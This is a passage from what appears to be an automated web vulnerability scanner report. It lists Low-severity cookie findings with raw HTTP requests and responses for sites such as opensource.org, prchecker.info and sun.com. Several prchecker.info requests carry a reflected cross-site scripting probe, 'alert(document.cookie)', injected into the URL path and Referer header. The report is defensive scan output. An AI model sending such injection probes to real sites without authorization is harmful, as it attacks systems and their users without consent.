       <title>Do
...[SNIP]...

7.75. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:04 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ijgl4skhaauead3jbjpeehfq85; expires=Tue, 22-Mar-2011 02:52:24 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 26 Feb 2011 23:16:45 GMT
ETag: "a2b9adb9088fa7f13f5bc31777ac32e5"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

7.76. http://www.paperthin.com/marketing/Flexible-Content-Management.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperthin.com
Path:   /marketing/Flexible-Content-Management.cfm

Request

GET /marketing/Flexible-Content-Management.cfm?gclid=CO_90836pqcCFc165Qod_wxfCQ HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:08:44 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Set-Cookie: CFID=2258137;expires=Tue, 08-Mar-2011 23:08:44 GMT;path=/
Set-Cookie: CFTOKEN=84911791;expires=Tue, 08-Mar-2011 23:08:44 GMT;path=/
pragma: no-cache
Expires: Mon, 06 Jan 1990 00:00:01 GMT
cache-control: no-store
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 68572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...

7.77. http://www.prchecker.info/check_page_rank.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Request

GET /check_page_rank.php HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ee51bb0a4bc8cf2cfe71626e4bea1ef6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.78. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/gomymammy.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/gomymammy.php

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/gomymammy.php HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=17fa818a2669be208121b9877a550a3f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.79. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/bn2.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/bn2.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/bn2.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1d929ae1738de5f2cc028b88b8f90816; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.80. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/cf1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/cf1.jpg

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/cf1.jpg HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=c2ce84d91196c9a1cd22a860c27e8da5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.81. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/ln1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/ln1.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/ln1.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=78d4ec6c5c54b19dffe8c8f9e51a596c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.82. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/nch.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/nch.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/nch.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=efb1721ce5ef690092dd68e2d8942e06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.83. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tbg1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tbg1.jpg

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tbg1.jpg HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=431fd57ae8495149c3f3362342ad9375; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.84. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tn2.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tn2.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tn2.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cbc18245b810277d35d1b2c40bbeb661; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.85. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/whh1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/whh1.jpg

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/whh1.jpg HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=23240c88192adebca071115671e7123e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.86. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newg1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newg1.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newg1.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=6f97ad39c956e0530b4ef28033deb963; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.87. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newr1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newr1.gif

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newr1.gif HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ef255219245829debbdfa061d4fd4a2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.88. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/logo.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prchecker.info
Path:   /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/logo.jpg

Request

GET /check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/logo.jpg HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 11:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=beed4b7142647c62621320fc906a4bb9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...

7.89. http://www.startlogic.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.startlogic.com
Path:   /

Request

GET / HTTP/1.1
Host: www.startlogic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 26 Feb 2011 23:18:24 GMT
Server: Apache
Set-Cookie: SESSION_ID=76e480529c69538e3a50ba2d292c52ba; domain=.startlogic.com; path=/
Pragma: no-cache
Cache-control: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Expires: Sat, 26 Feb 2011 23:18:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-
...[SNIP]...

7.90. http://www.sti-seoservices.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sti-seoservices.com
Path:   /

Request

GET / HTTP/1.1
Host: www.sti-seoservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 26 Feb 2011 23:10:59 GMT
Server: Apache/2.0.63 (Red Hat)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=iv0i1uaomf4bdm9iepq4t50po4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.sti-seoservices.com/xmlrpc.php
Link: <http://wp.me/P1ghTO-2>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>STI-SEO Services | Best SEO Company USA, Search Engine Optimization Companies USA, Local NYC</title>
<link rel
...[SNIP]...

7.91. http://www.sun.com/images/pc10/pc10_dwnlds_java_hvr.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sun.com
Path:   /images/pc10/pc10_dwnlds_java_hvr.gif

Request

GET /images/pc10/pc10_dwnlds_java_hvr.gif HTTP/1.1
Host: www.sun.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/java/javase/downloads/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 26 Feb 2011 23:26:35 GMT
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
Cache-control: public
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=44b8c7afa808b0e7c38ffb4b78d3; Path=/
Etag: W/"5943-1263505145000"
Last-modified: Thu, 14 Jan 2010 21:39:05 GMT
Content-type: image/gif
Content-length: 5943
Via: 1.1 https-www
Proxy-agent: Sun-Java-System-Web-Server/7.0
Set-cookie: JROUTE=s8bD7JNwH0n363Tk; Path=/

GIF89a..z..............&...............c....D7....\..:9..Z............U......cJ..~....f..I(..|.............-"....}}...........T.QA.~n......................................1............................
...[SNIP]...

7.92. http://www.sun.com/images/pc10/pc10_dwnlds_javaee.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sun.com
Path:   /images/pc10/pc10_dwnlds_javaee.gif

Request

GET /images/pc10/pc10_dwnlds_javaee.gif HTTP/1.1
Host: www.sun.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/java/javase/downloads/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 26 Feb 2011 23:26:36 GMT
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
Cache-control: public
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=44b151e154c3e20c17a103b053cf; Path=/
Etag: W/"9398-1263498675000"
Last-modified: Thu, 14 Jan 2010 19:51:15 GMT
Content-type: image/gif
Content-length: 9398
Via: 1.1 https-www
Proxy-agent: Sun-Java-System-Web-Server/7.0
Set-cookie: JROUTE=vqO1ZdA6pjKFtjrs; Path=/

GIF89a..z........;..........................{......n......Ep.........1.....^........K......p...D.................s..g...........x-...................X...V.......x...H.w..p2......g................5.M..
...[SNIP]...

7.93. http://www.sun.com/images/pc10/pc10_dwnlds_javafx_hvr.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sun.com
Path:   /images/pc10/pc10_dwnlds_javafx_hvr.gif

Request

GET /images/pc10/pc10_dwnlds_javafx_hvr.gif HTTP/1.1
Host: www.sun.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/java/javase/downloads/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
